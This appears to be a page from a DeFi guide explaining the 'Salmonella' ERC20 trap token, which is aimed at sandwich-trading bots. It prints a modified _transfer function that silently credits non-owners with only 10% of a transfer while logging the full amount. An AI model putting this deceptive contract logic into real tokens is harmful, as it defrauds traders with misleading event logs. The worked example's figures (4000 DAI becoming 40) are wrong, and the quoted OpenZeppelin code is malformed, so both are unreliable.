Salmonella Contract

Wrecking sandwich traders for fun and profit

The premise of the Salmonella contract is very simple. It’s a regular ERC20 token, which behaves exactly like any other ERC20 token in typical use cases. However, it has some special logic to detect when anyone other than the specified owner is transacting it, and in these situations it only returns 10% of the specified amount - despite emitting event logs which match a trade of the full amount.

Source: https://github.com/Defi-Cartel/salmonella

You can set the contract owner, and the change is in the balance sender function.

ERC20 Contract

function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances [sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); } _balances[sender] = senderBalance - amount; _balances [recipient] += amount; emit Transfer(sender, recipient, amount); }

Source (line 211-222): https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/ERC20.sol

Salmonella Contract

function _transfer(address sender, address recipient, uint256 amount) internal virtual {
  require(sender != address(0), "ERC20: transfer from the zero address");
  require(recipient != address(0), "ERC20: transfer to the zero address");
  uint256 senderBalance = _balances[sender];
  require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
  if (sender == ownerA || sender == ownerB) {
    _balances[sender] = senderBalance - amount;
    _balances[recipient] += amount;
  } else {
    _balances[sender] = senderBalance - amount;
    uint256 trapAmount = (amount * 10) / 100;
    _balances[recipient] += trapAmount;
  }
  emit Transfer(sender, recipient, amount);
}

Source: https://github.com/Defi-Cartel/salmonella

Difference

Added uint256 trapAmount = (amount * 10) / 100; in the balance function, which sends only 10% out of 100% of the price bought, and 90% of the tokens will get burned.

Example

You want to swap 100 UNI for DAI You send 100 UNI to Uniswap Poll (contract) 100 UNI = 4000 DAI but with the Salmonella contract, it takes 90% of the DAI that was supposed to be sent to you will get burned and you receive 40 DAI

Sandwich attacks

Further reading

  • Paper on sandwich attacks Source: https://medium.com/coinmonks/demystify-the-dark-forest-on-ethereum-sandwich-attacks-5a3aec9fa33e

PreviousPermitsNextFrontrun bidding

Last updated